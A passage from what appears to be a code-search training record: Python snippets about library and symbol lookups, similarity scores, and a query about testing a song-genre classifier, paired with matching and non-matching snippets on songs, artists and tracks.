package in __init__.py\n # We don't want to let an internal reference as not found\n import_module[\"lookup\"] = \"@internal\"\n elif name.partition(\".\")[0] == item[\"fullname\"].partition(\".\")[0]:\n # This is in case a module from within the same package has not been found\n # We don't want to let an internal reference as not found\n import_module[\"lookup\"] = \"@internal\"\n else:\n # In last resort, we look for the package in the standard library\n if name in python_stdlib:\n import_module[\"lookup\"] = \"@stdlib\"\n apply_tree(tree, _apply, args=(_build_python_stdlib(stdlib_lookup),))", "def list(full, field):\n\n short = not full \n\n libraries = select(l for l in Library if l)[:]\n libraries = natsorted(libraries, key=lambda x : attrgetter('name')(x).lower())\n\n if len(libraries) == 0:\n logger.info(\"[!] No libraries available to list.\") \n logger.info(\" Consider run the following command:\")\n logger.info(\" $ apkg init\")\n return \n\n\n\n orderFields = [ \n #, \"library\"\n #, \"sha\"\n \"description\"\n # , \"license\"\n # , \"include\"\n # , \"depend\"\n # , \"testedWith\"\n , \"keywords\"\n # , \"installed\"\n # , \"cached\"\n # , \"fromIndex\"\n # , \"fromUrl\"\n # , \"fromGit\"\n , \"origin\"\n # , \"default\"\n ]\n\n i = 0\n if short and field == \"\":\n logger.info(\"{:<20.20} {:<15.20} {:.72}\"\n .format(\"Library name\", \"Latest version\", \"URL\"))\n logger.info(\"-\"*105)\n\n for library in libraries:\n v = library.getLatestVersion() \n if v is not None:\n if not short:\n\n logger.info(v.library.name)\n logger.info(\"=\"*len(v.library.name))\n\n info = v.info\n\n for k in orderFields: \n val = info.get(k, None)\n if val is not None or val != \"\" or len(val) > 0:\n click.echo(\"{0}: {1}\".format(k,val))\n\n vs = ','.join(str(ver) for ver in v.library.versions)\n \n if len(vs) > 0:\n print(\"Versions:\", vs)\n \n else:\n if field in listFields:\n if field == \"name\":\n print(v.library.name)\n elif field == \"version\":\n print(v.name)\n else:\n print(v.library.url)\n else:\n print(\"{:<20.20} {:<15.20} {:.72}\"\n .format(v.library.name,v.name,v.library.url))\n\n i += 1\n if not short and i < len(libraries):\n logger.info(\"\")", "def _key_func_3(entry: tuple[str, list]) -> str:\n key, (targets, sub_items, category_key) = entry\n # hack: mutating the sub_items dicts to a list in the key_func\n entry[1][1] = sorted(((sub_key, sub_targets)\n for (sub_key, (sub_targets, _0, _sub_category_key))\n in sub_items.items()), key=_key_func_2)\n\n if category_key is not None:\n return category_key\n\n # now calculate the key\n if key.startswith('\\N{RIGHT-TO-LEFT MARK}'):\n key = key[1:]\n letter = unicodedata.normalize('NFD', key[0])[0].upper()\n if letter.isalpha() or letter == '_':\n return letter\n\n # get all other symbols under one heading\n return _('Symbols')", "def search_by_shelf(library: list) -> None:\n user_input = input(f'What is the number/name of the shelf you want to search for?')\n found_books = []\n for book in library:\n if user_input.lower() == str(getattr(book, 'shelf')).lower():\n found_books.append(book)\n print(f'We found {len(found_books)} book(s) that matched this search in your library.\\n')\n for num, book in enumerate(found_books, 1):\n print(f'{num} - {book.__repr__()}')\n if len(found_books) > 0 and not return_to_main_menu():\n move_book(library, found_books)", "def get_library_keys(self):\n return list({\n self._create_library_locator(library_index, branch=None)\n for library_index\n in self.find_matching_course_indexes(branch=\"library\")\n })", "def locateObjNumberNoun(data, questionDict, questionIdict):\n how = questionDict['how']\n many = questionDict['many']\n for t in range(data.shape[0] - 2):\n if data[t, 0] == how and \\\n data[t + 1, 0] == many:\n for u in range(t + 2, data.shape[0]):\n word = questionIdict[data[u, 0] - 1]\n lexname = lookupLexname(word)\n if (lexname is not None and \\\n lexname.startswith('noun')) or \\\n (lexname is None):\n return data[u, 0]\n print 'not found'\n return data[-1, 0]", "def item_info():\n item_code = get_input(\"Enter item code: \")\n if item_code in FULL_INVENTORY:\n print_dict = FULL_INVENTORY[item_code]\n output = \"\"\n for key, value in print_dict.items():\n output += (\"{}:{}{}\".format(key, value, \"\\n\"))\n else:\n output = \"Item not found in inventory\"\n print(output)\n return output", "def symbol_name(string):\n return 'USymbol' + convert_name(string, True)", "def test_GetSymbolMapping_multiple_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/myapp.mojo/.lM03ws\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/otherapp.mojo at /path/to/otherapp.mojo/.kW07s\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\",\n \"/path/to/otherapp.mojo/.kW07s\": \"libotherapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def findSymbol(self, exp):\n k = str(exp)\n try:\n return self.currSyms[k]\n except KeyError:\n raise SymbolNotFound('Identifier not found:<%s>' % (k))", "def module_name(self):\n return \"py{0:s}\".format(self.library_name[3:])", "def get_package_info(package_name):\n r = requests.get(f'https://api.npms.io/v2/search?q={package_name}&size=1')\n response_json = r.json()\n\n if 'results' in response_json:\n result = response_json['results'][0]\n return result['package']", "def test_GetSymbolMapping_simple_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def get_library(self,identifier=None,version=None,filename=None):\r\n\r\n session = self.session\r\n if identifier is not None and identifier > \"\":\r\n libraries = session.query(LibraryRecord).filter(LibraryRecord.id_name==identifier).order_by(desc(LibraryRecord.version)).all()\r\n if len(libraries) == 0:\r\n raise Exception(f\"No library with identifier {identifier} found\")\r\n else:\r\n libraryListStr = \"\"\r\n for library in libraries:\r\n libraryListStr += library.version+\",\"\r\n if version is not None and version > \"\":\r\n if version == library.version:\r\n return(library)\r\n if version is not None and version > \"\":\r\n raise Exception(f\"Unable to find version {version} of library {identifier}\")\r\n if len(libraries) == 1:\r\n return(library)\r\n raise Exception(f\"There are several version of this library ({libraryListStr}). Please specify a version\")\r\n return()\r\n\r\n elif filename is not None and filename > \"\":\r\n raise Exception(\"Search by filename not implemented\")\r\n else:\r\n raise Exception(\"Not enough information to find library\")\r\n\r\n return()", "def get_path(gi, path):\n\n sp = path.split(\"/\")\n if len(sp) == 0:\n raise Exception(\"cannot determine library\")\n\n library_name = sp[0]\n lib = gi.libraries.get_libraries(name=library_name)\n if not lib:\n return None\n\n if len(lib) > 1:\n raise Exception('found more than one library named \"%s\"', library_name)\n\n lib = lib[0]\n\n if len(sp) == 1:\n return lib\n\n subpath = \"/\" + '/'.join(sp[1:])\n contents = gi.libraries.show_library(lib[\"id\"], contents=True)\n for entry in contents:\n if entry[\"name\"] == subpath:\n return entry\n\n return None", "def checkLookup(self, name):\n if not self.symbols.has_key(name):\n # we don't care\n return None\n # is it one we really care about\n t = self.symbols[name].getType()\n if t == \"typedef\":\n t = self.symbols[name].getAliasType()\n if t == \"general\" or t == \"struct\" or t == \"union\":\n return self.symbols[name]", "def getLibVersion():\n return \"Software Development Library for Linux 1.999.1\"", "def libraryName(self):\n return _osgAnimation.LinkVisitor_libraryName(self)", "def display_library_details():\n\n acct = get_current_account(session['acct'])\n if request.method == \"POST\":\n # post request response goes here\n library = request.form.get(\"library_id\")\n session['lib'] = library\n flash(\"Thanks for selecting your library system!\")\n return redirect(\"/library\")\n\n else:\n if 'lib' in session:\n lib = session['lib']\n library = get_library_details(lib, OVRDRV_KEY, OVRDRV_SECRET)\n\n else:\n library = None\n\n return render_template(\"library_info.html\", library=library, acct=acct)", "def lookup():", "def _get_playlist_index_by_name(library_list, playlist_name):\n for playlist in library_list:\n if playlist['name'] == playlist_name:\n return library_list.index(playlist)\n return None", "def get_symbol_value(self, obj, name):\n # Lookup symbol:\n if obj.has_symbol(name):\n return obj.get_symbol_value(name)\n elif name in self.extra_symbols:\n return self.extra_symbols[name]\n else:\n raise CompilerError(\n 'Undefined reference \"{}\"'.format(name))", "def get_package_info():\n\n with open(hack.CONDA_ARTIFACT_FILENAME, 'r') as fn:\n pkg_location = fn.read().strip()\n pkg_name = os.path.basename(pkg_location)\n\n return pkg_location, pkg_name", "def get_item_code_for_item_id(item_id):\n records = frappe.db.sql(\"\"\"\n SELECT ebay.sku\n FROM `zeBayListings` as ebay\n WHERE ebay.ebay_id = %(item_id)s;\n \"\"\", {'item_id': item_id}, as_dict=True)\n if len(records) > 1:\n raise ErpnextEbaySyncError(f'Too many hits for item {item_id}!')\n elif records:\n return records[0].sku\n # We have not located the item.\n item_data = None\n try:\n item_data = get_item_trading(item_id, output_selector=['SKU'])\n except ConnectionError as e:\n if e.response.dict()['Errors']['ErrorCode'] == 17:\n # Could not find/not allowed error\n raise ErpnextEbaySyncError(f'Could not find {item_id}!')\n else:\n raise\n return item_data['SKU']", "def nm(filename):\n binary = parse(filename) # Build an abstract binary\n symbols = binary.symbols\n\n if len(symbols) > 0:\n for symbol in symbols:\n print(symbol)\n else:\n print(\"No symbols found\")", "def test_GetSymbolMapping_parameter_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo?q=hello at /path/to/myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def searchLib(self, logger):\n # Now search\n self._version_strings = []\n self._sanity_exists = False\n for bin_str in self._all_strings:\n # we have a match\n if self.VERSION_STRING in str(bin_str):\n version_string = str(bin_str)\n # valid match\n logger.debug(\"Located a version string of %s in address 0x%x\", self.NAME, bin_str.ea)\n # save the string for later\n self._version_strings.append(version_string)\n # check the sanity string\n if self.SANITY_STRING in str(bin_str):\n self._sanity_exists = True\n\n # return the result\n if self._sanity_exists and len(self._version_strings) == 0:\n return 1\n else:\n return len(self._version_strings)", "def map_release_label():\n release = \"\".join(map(lambda x: x.lower(), sh.lsb_release(\"-irs\").split()))\n return OS_MAPPING[next(k for k in OS_MAPPING if re.search(k, release))]", "def lib_name_path(interface, simulator):\n library_name_path = os.path.join(libs_dir, lib_name(interface, simulator))\n\n # On Windows use mixed mode \"c:/a/b/c\" as this work in all cases\n if os.name == \"nt\":\n return library_name_path.replace(\"\\\\\", \"/\")\n\n return library_name_path", "def libraryName(self):\n return _osgAnimation.Bone_libraryName(self)", "def read_symbol(table, index, br):\n x_bits = br.read_bits(16, 0) # The C reference version assumes 15 is the max needed and uses 16 in this function\n index += (x_bits & HUFFMAN_TABLE_MASK)\n nbits = table[index].bits - HUFFMAN_TABLE_BITS\n skip = 0\n if nbits > 0:\n skip = HUFFMAN_TABLE_BITS\n index += table[index].value + ((x_bits >> HUFFMAN_TABLE_BITS) & br.kBitMask[nbits])\n br.read_bits(None, skip + table[index].bits)\n return table[index].value", "def _ask_ctypes(self):\n if os.name == 'nt':\n libpath = find_library(self._libname)\n libpath = libpath if libpath is not None else find_library(self._libname + '.dll')\n else:\n libpath = find_library(self._libname)\n return str(libpath) if libpath is not None else libpath", "def split_lib_transform(header):\r\n if header.startswith('>'):\r\n header = header[1:]\r\n fields = header.split()\r\n lib_id = fields[0]\r\n qual_id = fields[1]\r\n bc = fields[2].split('=')[1]\r\n return ' '.join([lib_id, 'read_id=' + qual_id, 'barcode=' + bc]), qual_id", "def getSymbol(self, name: unicode, namespace: ghidra.program.model.symbol.Namespace) -> ghidra.program.model.symbol.Symbol:\n ...", "def get_data(symbollist, index_name, ext = ''):\n\n data_lists = {}\n for index, symbol in enumerate(symbollist):\n symbollist[index] = (symbol + ext, data_lists, index_name)\n pool = Pool(5)\n ##map symbol list to _get_data() fn. return tuple, with (symbol, statlist).\n \n pool.map(_get_data, symbollist)\n return data_lists", "def __getitem__(self,name):\n if not isinstance(name,str):\n raise KeyError('Dae key must be a string')\n\n try:\n return self._syms[name]\n except KeyError:\n raise KeyError(name+' is not a symbol in Dae')", "def list_library(command):\n namespace = app.main(command)\n assert namespace.command == 'll' or namespace.command == \"listlibrary\"", "def _get_asset_info(item, name):\n\n if name in item.assets:\n return item.assets[name]\n elif name.replace(\"B\", \"B0\") in item.assets:\n # Bx -> B0x\n return item.assets[name.replace(\"B\", \"B0\")]\n elif name.replace(\"B0\", \"B\") in item.assets:\n # B0x -> Bx\n return item.assets[name.replace(\"B0\", \"B\")]\n else:\n available = [key for key in item.assets.keys() if key not in [\"thumbnail\", \"overview\", \"info\", \"metadata\"]]\n raise KeyError(\"asset '%s' not found. Available assets: %s\" % (name, avaialable))" ]
[ "0.6351624", "0.588709", "0.558512", "0.5506981", "0.5491768", "0.5448772", "0.5388454", "0.5337695", "0.53156734", "0.5299146", "0.5281417", "0.5229371", "0.52056694", "0.5185004", "0.51806813", "0.51693463", "0.5163847", "0.51593566", "0.5133286", "0.51013744", "0.5091456", "0.50519097", "0.5029301", "0.50138074", "0.5013332", "0.4988081", "0.4985455", "0.49746305", "0.49648404", "0.49640262", "0.49518466", "0.4949847", "0.4941515", "0.49295548", "0.49140912", "0.49124053", "0.49078113", "0.488187", "0.4878763", "0.48754877", "0.48567316", "0.48476222", "0.4846103", "0.48457322", "0.48445532", "0.48391345", "0.48325667", "0.48243767", "0.48120725", "0.48071355", "0.47984004", "0.47968072", "0.47937652", "0.47777846", "0.47749016", "0.4758529", "0.47584274", "0.47584274", "0.47517747", "0.47268784", "0.4726851", "0.4721849", "0.47049534", "0.47031766", "0.46996257", "0.46938804", "0.46934348", "0.4688084", "0.46866497", "0.46788383", "0.46788183", "0.46743703", "0.46701276", "0.46660313", "0.46596953", "0.46572125", "0.46485057", "0.46482366", "0.46321243", "0.4630092", "0.46293744", "0.46245", "0.46183664", "0.4616756", "0.46138155", "0.46116", "0.4611277", "0.458535", "0.45765162", "0.45691192", "0.45682168", "0.45665196", "0.45645127", "0.45634645", "0.4546012", "0.45434552", "0.45407277", "0.45389536", "0.45369545", "0.45348755" ]
0.78984857
0
Test on a data set of songs and known genres.
def test(self, songs, genres): logging.info('Starting testing.') num_matches = 0 confusion_matrix = ConfusionMatrix(genres) for song, actual_genre in zip(songs, genres): predicted_genre = self.classify(song) logging.info('Actual genre: {}, predicted genre: {}'.format(actual_genre, predicted_genre)) confusion_matrix.add_genres(actual_genre, predicted_genre) if actual_genre == predicted_genre: num_matches += 1 return num_matches, confusion_matrix
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_songs_by_genre(self, track_elms, service_config, request):\n genre_id = uuid.UUID(avalon.compat.to_uuid_input('c12d2a49-d086-43d6-953d-b870deb24228'))\n service_config.track_store.get_by_genre.return_value = track_elms\n service_config.id_cache.get_genre_id.return_value = genre_id\n request.args['genre'] = 'Genre'\n params = avalon.web.request.Parameters(request)\n\n service = avalon.web.services.AvalonMetadataService(service_config)\n results = service.get_songs(params)\n\n assert results == track_elms, 'Expected matching tracks returned'\n service_config.track_store.get_by_genre.assert_called_with(genre_id)", "def test_get_songs_by_genre_id(self, track_elms, service_config, request):\n genre_id = uuid.UUID(avalon.compat.to_uuid_input('26ce4d6b-af97-45a6-b7f6-d5c1cbbfd6b1'))\n service_config.track_store.get_by_genre.return_value = track_elms\n request.args['genre_id'] = six.text_type(genre_id)\n params = avalon.web.request.Parameters(request)\n\n service = avalon.web.services.AvalonMetadataService(service_config)\n results = service.get_songs(params)\n\n assert results == track_elms, 'Expected matching tracks returned'\n service_config.track_store.get_by_genre.assert_called_with(genre_id)", "def get_metadata(data):\n genres = list(data[\"genre\"])\n print(\"genres:\", len(set(genres)), set(genres))\n return genres", "def find_genre_playlists(data):\n playlists = []\n\n if data['genre']:\n playlists += data['genre']\n\n if data['comments']:\n playlists += data['comments']\n\n matches = re.findall('\\(\\s*(cover|live|unplugged|acoustic|remix|instrumental)', data['title'].lower())\n if matches:\n if 'cover' in matches:\n matches.remove('cover')\n matches += ['covers']\n\n if 'acoustic' in matches:\n matches.remove('acoustic')\n matches += ['unplugged']\n\n if 'remix' in matches:\n matches.remove('remix')\n matches += ['remix']\n\n if 'instrumental' in matches:\n matches.remove('instrumental')\n matches += ['instrumental']\n\n playlists += matches\n\n return set([x for x in playlists if x != 'none'])", "def test_iter_genotypes(self):\n with self.reader_f() as f:\n for g in f.iter_genotypes():\n variant_name = VARIANT_NAME_FIX.get(\n (truth.variant_to_key[g.variant], g.coded),\n truth.variant_to_key[g.variant],\n )\n\n expected = truth.genotypes[variant_name]\n self.assertEqual(expected, g)", "def random_by_genre_track_list(self):\n\n genre = self.addon_args[\"foldername\"][0].decode(\"utf-8\")\n\n xbmcplugin.setContent(self.addon_handle, \"songs\")\n\n for track in self.connection.walk_random_songs(\n size=self.random_count, genre=genre):\n self.add_track(track, show_artist=True)\n\n xbmcplugin.endOfDirectory(self.addon_handle)", "def test_songs_played(self):\n self.assertEqual(self.show.song_booleans, {\n 'you-enjoy-myself': 1,\n 'tweezer': 0\n })", "def classical_search(data, primary, genre):\n __counter = 0 # count total number of songs get\n __browser = chrome_driver_setup()\n\n # read data file, extract list of artists\n artists = txt_to_list(data, delimiter=',')\n\n # for each artist, find artist id and then output list of album names\n __index = 0\n make_directory(\"results/{}\".format(primary))\n filecount = 0\n while filecount <= len(artists)//10:\n print(\"========== Starting for batch {} - {} ==========\".format(filecount*10,(filecount+1)*10))\n for artist in artists[filecount*10:(filecount+1)*10]:\n print(\" NOW FOR ARTIST: {} \".format(artist))\n aid = get_artist_id(artist)\n if aid is None:\n print(\"Cannot find artist {} in Spotify.\".format(artist))\n continue\n album_ids = get_artist_albums_classical(aid)\n for album in album_ids:\n tracks = get_album_tracks(album, 'name')\n if tracks is None:\n print(\"Artist {} has no album found in Spotify.\".format(artist))\n continue\n for track in tracks:\n if track is None or track == \"\":\n print(\"Empty track, skip...\")\n continue\n print(\"Current track: {}\".format(track))\n sleep(randint(3, 5))\n __index += 1\n link, score, title, duration = get_song_for_classical(track, __browser, genre)\n if link == \"skipped\":\n print(\"Duplicate, skip...\")\n continue\n csv_writer_append(\"results/{}/{}_{}.csv\".format(primary, genre, filecount+1),\n __index,\n track,\n title,\n link,\n score,\n duration)\n print(\"{} -- CSV done: {} {} {} {}\".format(__index, title, link, score, duration))\n print(\"\")\n print(\"||||||||||| Finished for batch {} - {} |||||||||||\".format(filecount*10,(filecount+1)*10))\n filecount += 1", "def get_genius_song(song_name, artist_name, genius):\n song_search = song_name\n for i in range(0, 2):\n song = genius.search_song(song_search, artist_name)\n if isinstance(song, type(None)) or not match(\n\t (song_search, artist_name), (song.title, song.artist)\n ):\n if i:\n log(f\"Song '{song_search}' by '{artist_name}' not found on Genius\")\n return\n else:\n log(f\"Song '{song_search}' by '{artist_name}' not found on Genius trying cleaning\")\n song_search = clean(song_search)\n else:\n if i:\n log(f\"Found match for '{song_search}' by '{artist_name}'\")\n break\n\n return song", "def setUp(self):\n\n self.song_a = Song('a', 1)\n self.song_b = Song('b', 2)\n self.song_c = Song('c', 3)\n self.song_d = Song('d', 4)\n\n self.song_e = Song('e', 5)\n self.song_f = Song('f', 6)\n self.song_e.similar_songs.append(self.song_f)\n self.song_f.similar_songs.append(self.song_e)", "def test_readSongData():\n\n # make sure the number of columns pull out from the database is correct\n assert svd.song_df.shape[1] == 8", "def test_get_g_data_1(self):\n self.db_filter.values = [40481]\n\n g_data = review.get_g_data(self.alchemist, self.db_filter, 40481)\n\n self.assertTrue(isinstance(g_data, list))\n\n for header in review.PG_HEADER:\n with self.subTest(header=header):\n self.assertTrue(header in g_data[0].keys())\n self.assertFalse(isinstance(g_data[0][header], list))", "def random_by_genre_list(self):\n\n for genre in self.connection.walk_genres():\n url = self.build_url({\n \"mode\": \"random_by_genre_track_list\",\n \"foldername\": genre[\"value\"].encode(\"utf-8\")})\n\n li = xbmcgui.ListItem(genre[\"value\"])\n xbmcplugin.addDirectoryItem(\n handle=self.addon_handle, url=url, listitem=li, isFolder=True)\n\n xbmcplugin.endOfDirectory(self.addon_handle)", "def test_get_genres_no_params(self, id_name_elms, service_config, request):\n service_config.genre_store.get_all.return_value = id_name_elms\n params = avalon.web.request.Parameters(request)\n\n service = avalon.web.services.AvalonMetadataService(service_config)\n results = service.get_genres(params)\n\n assert results == id_name_elms, 'Expected all genres returned'", "def cheer(self, songs):\n if self.favourite_song in songs:\n return \"Whoo!\"", "def test_rawdata(data):\n base = list(data)[0]\n if base in [\"tv\",\"leftovers\",\"tv short\",\"movie\",\"OVA / ONA / Special\"]:\n return True\n return False", "def test_SampleIds(self):\r\n exp = [\"PC.354\", \"PC.355\", \"PC.356\", \"PC.481\", \"PC.593\", \"PC.607\",\r\n \"PC.634\", \"PC.635\", \"PC.636\"]\r\n obs = self.overview_map.SampleIds\r\n self.assertEqual(obs, exp)\r\n\r\n obs = self.no_metadata.SampleIds\r\n self.assertEqual(obs, exp)\r\n\r\n obs = self.empty_map.SampleIds\r\n self.assertEqual(obs, [])", "def get_artist_songs(self,genre = \"[Not Provided]\"):\n # Search for the artist and get their id\n search_artist = self.search(self.artist_name)\n\n #Prevents the stoppage in case of an Artist having zero lyrics on Genius\n if len(search_artist['response']['hits']) == 0:\n return False\n \n artist_id = str(search_artist['response']['hits'][0]['result']['primary_artist']['id'])\n print(\"ID: \" + artist_id)\n # Initialize DataFrame\n df = pd.DataFrame(columns=['title', 'url'])\n # Iterate through all the pages of the artist's songs\n more_pages = True\n page = 1\n i = 0\n while more_pages:\n # Make a request to get the songs of an artist on a given page\n request_url = self.base_url + 'artists/' + artist_id + '/songs' + '?per_page=50&page=' + str(page)\n response = requests.get(request_url, headers=self.headers).json()\n\n # For each song which the given artist is the primary_artist of the song, add the song title and\n # Genius URL to the DataFrame\n for song in response['response']['songs']:\n if str(song['primary_artist']['id']) == artist_id:\n title = song['title']\n url = song['url']\n df.loc[i] = [title, url]\n i += 1\n page += 1\n\n if response['response']['next_page'] is None:\n more_pages = False\n\n \n # Get the HTML and Song Lyrics from helper methods in the class\n df['artist'] = self.artist_name\n df['html'] = df['url'].apply(self.get_song_html)\n df['lyrics'] = df.apply(lambda row: self.get_lyrics(row.html), axis=1)\n #Uncomment to use the genre method otherwise\n #df['genre'] = df.apply(lambda row: self.get_genre(row.html), axis=1)\n df['genre'] = genre\n \n del df['url']\n del df['html']\n\n self.artist_songs = df\n\n return self.artist_songs", "def test_SampleIds(self):\n exp = [\"PC.354\", \"PC.355\", \"PC.356\", \"PC.481\", \"PC.593\", \"PC.607\",\n \"PC.634\", \"PC.635\", \"PC.636\"]\n obs = self.overview_map.SampleIds\n self.assertEqual(obs, exp)\n\n obs = self.no_metadata.SampleIds\n self.assertEqual(obs, exp)\n\n obs = self.empty_map.SampleIds\n self.assertEqual(obs, [])", "def test_get_gm_track_artists_ft_1(self):\r\n gm_track = gmusic.GMusicTrack(\r\n title='Stretch Deep (feat. Eve Essex)',\r\n artist='James K'\r\n )\r\n expected = ['Eve Essex', 'James K']\r\n actual = gmspotify.get_gm_track_artists(gm_track)\r\n self.assertEqual(actual, expected)", "def get_songs(self, song_list):\n self.songs = [[s.name, s.movie_name] for s in song_list\n if s.raga == self.name]", "def albums_by_genre_list(self):\n\n genre = self.addon_args[\"foldername\"][0].decode(\"utf-8\")\n\n xbmcplugin.setContent(self.addon_handle, \"albums\")\n\n for album in self.connection.walk_album_list_genre(genre):\n self.add_album(album, show_artist=True)\n\n xbmcplugin.endOfDirectory(self.addon_handle)", "def test_two_tracks_various_artists(self):\n self.add_mp3(filename='1.mp3')\n self.add_mp3(filename='2.mp3', set_artist=True, artist='Artist 2')\n (added, status) = self.app.add_album(self.filenames)\n self.assertEqual(added, True)\n self.assertEqual(self.get_album_count(), 1)\n album = Album.get_by_artist_album(self.app.curs, 'Various', 'Album')\n self.assertNotEqual(album, None)\n self.assertEqual(album.artist, 'Various')\n self.assertEqual(album.album, 'Album')\n self.assertEqual(album.album_type, 'album')\n self.assertEqual(album.totalseconds, 4)\n self.assertEqual(album.totaltracks, 2)", "def process_songs(songs):\r\n print(\"[SETUP] STATUS: Creating the pool.\")\r\n workers = multiprocessing.Pool(pool_size())\r\n print(\"[SETUP] STATUS: Pool created with {} workers, assigning work.\".format(pool_size()))\r\n results = workers.map(cut_and_eq, songs)\r\n workers.close()\r\n workers.join()\r\n\r\n results = [result for result in results if result is not None]\r\n return results", "def __test_and_train(self):\n f = open(\"all_data_info.csv\")\n reader = csv.DictReader(f, delimiter=\",\")\n data = []\n for line in reader:\n if line['artist_group'] == \"train_and_test\" and line[\"in_train\"] == \"False\":\n # the img's artist is in training set\n # but the img is in test set only\n data.append((line['artist'], line['new_filename']))\n\n return data", "def get_song_artist_matches():\n resulta, results, all_data = get_song_artist()\n answers = {}\n for entry in resulta:\n if entry in results:\n answers[entry] = [[], []]\n # for info in chk_conc_scan.all_data:\n for info in all_data:\n if entry == info[0]:\n answers[entry][0].append(info)\n if entry == info[1]:\n answers[entry][1].append(info)\n structv = {}\n for dupval in answers:\n structv[dupval] = []\n for entry in answers[dupval]:\n best = 100\n record = []\n for week in entry:\n if week[3] < best:\n record = week\n best = week[3]\n structv[dupval].append(record)\n return output_info(structv)", "def test_get_songs_by_album(self, track_elms, service_config, request):\n album_id = uuid.UUID(avalon.compat.to_uuid_input('f83fdec7-510f-44a5-87dc-61832669a582'))\n service_config.track_store.get_by_album.return_value = track_elms\n service_config.id_cache.get_album_id.return_value = album_id\n request.args['album'] = 'Album'\n params = avalon.web.request.Parameters(request)\n\n service = avalon.web.services.AvalonMetadataService(service_config)\n results = service.get_songs(params)\n\n assert results == track_elms, 'Expected matching tracks returned'\n service_config.track_store.get_by_album.assert_called_with(album_id)", "def _get_genres(self):\n separated = self.movies['genre'].apply(self.separate_genre)\n return {g: True for x in separated for g in x}.keys()", "def get_data(data, exit_fail=True):\n try:\n if data['track_name'] and data['artist_name']:\n for song in itunespy.search_track(data['track_name']):\n if data['artist_name'].lower() == song.artist_name.lower():\n if 'collection_name' not in data.keys():\n return song\n elif data['collection_name'].lower() in song.collection_name.lower():\n return song\n elif data['track_name']:\n return itunespy.search_track(data['track_name'])\n elif data['artist_name']:\n songs = []\n artists = itunespy.search_artist(data['artist_name'])[0]\n for album in artists.get_albums():\n for song in album.get_tracks():\n songs.append(song)\n return songs\n # Attempt to find a close match if no exact matches\n song = itunespy.search(' '.join([data['track_name'], data['artist_name'], data['collection_name']]))[0]\n if song:\n return song\n except LookupError as err:\n if exit_fail:\n logging.warning(Fore.RED+'✘ '+Style.RESET_ALL+str(err))\n sys.exit()", "def test_readSongData():\n\n # check type\n assert isinstance(song_df, pd.DataFrame)\n\n # check shape\n assert song_df.shape == (1972060, 8)", "def test_get_voice_datasets(self):\n pass", "def test_selecting_only_audio_episodes(\n only_audio_episodes: List[LepEpisode],\n) -> None:\n assert len(only_audio_episodes) == 14 # Without duplicates", "def test_audio_features(self):\n\n # 1ehPJRt49h6N0LoryqKZXq, 8737: How Far I'll Go (Alessia Cara Version) by Alessia Cara\n # 2fGFaTDbE8aS4f31fM0XE4, 5037: Pop 101 (feat. Anami Vice) by Marianas Trench\n targets = {8737: {'danceability': 0.317,\n 'energy': 0.562,\n 'key': 9,\n 'loudness': -9.609,\n 'mode': 1,\n 'speechiness': 0.395,\n 'acousticness': 0.124,\n 'instrumentalness': 0.000144,\n 'liveness': 0.0667,\n 'valence': 0.127,\n 'tempo': 181.100,\n 'duration_ms': 175507,\n 'time_signature': 4,\n },\n 5037: {'danceability': 0.756,\n 'energy': 0.658,\n 'key': 11,\n 'loudness': -6.128,\n 'mode': 0,\n 'speechiness': 0.202,\n 'acousticness': 0.0581,\n 'instrumentalness': 0,\n 'liveness': 0.0674,\n 'valence': 0.640,\n 'tempo': 120.018,\n 'duration_ms': 247829,\n 'time_signature': 4,\n },\n }\n\n results = {track.i_id: track for track in self.tracks if track.i_id in targets}\n\n for target, expecteds in targets.iteritems():\n result = results[target]\n for key, expected in expecteds.iteritems():\n self.assertEqual(result.__getattr__(key), expected)", "def spotifySearch(request,genre):\n\tif genre in genre_artist.keys():\n\t\ttracks = top_tracks(genre)\n\t\tif tracks:\n\t\t\treturn HttpResponse(json.dumps(tracks))\n\t\telse:\n\t\t\tresponse ={\"message\":\"Artist/track is not found.\", \"error\":True}\n\t\t\treturn HttpResponse(json.dumps(response))\n\telse:\n\t\tresponse = {\"message\": \"Please give an existed genre as a parameter. Genres are: rock, alternative rock, pop, blues, country, electronic, jazz, r&b, rap, reggae.\", \"error\":True}\n\t\treturn HttpResponse(json.dumps(response))", "def test_get_sample_ids(self):\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\\\n parse_metadata_state_descriptions('Study:Twin')), [])\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\\\n parse_metadata_state_descriptions('Study:Dog')), ['a','b'])\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\\\n parse_metadata_state_descriptions('Study:*,!Dog')), ['c','d','e'])\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\\\n parse_metadata_state_descriptions('Study:*,!Dog;BodySite:Stool')), ['e'])\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\\\n parse_metadata_state_descriptions('BodySite:Stool')), ['a','b','e'])", "def test_get_songs_by_artist(self, track_elms, service_config, request):\n artist_id = uuid.UUID(avalon.compat.to_uuid_input('2221930a-f28d-44ed-856b-c84b35f76713'))\n service_config.track_store.get_by_artist.return_value = track_elms\n service_config.id_cache.get_artist_id.return_value = artist_id\n request.args['artist'] 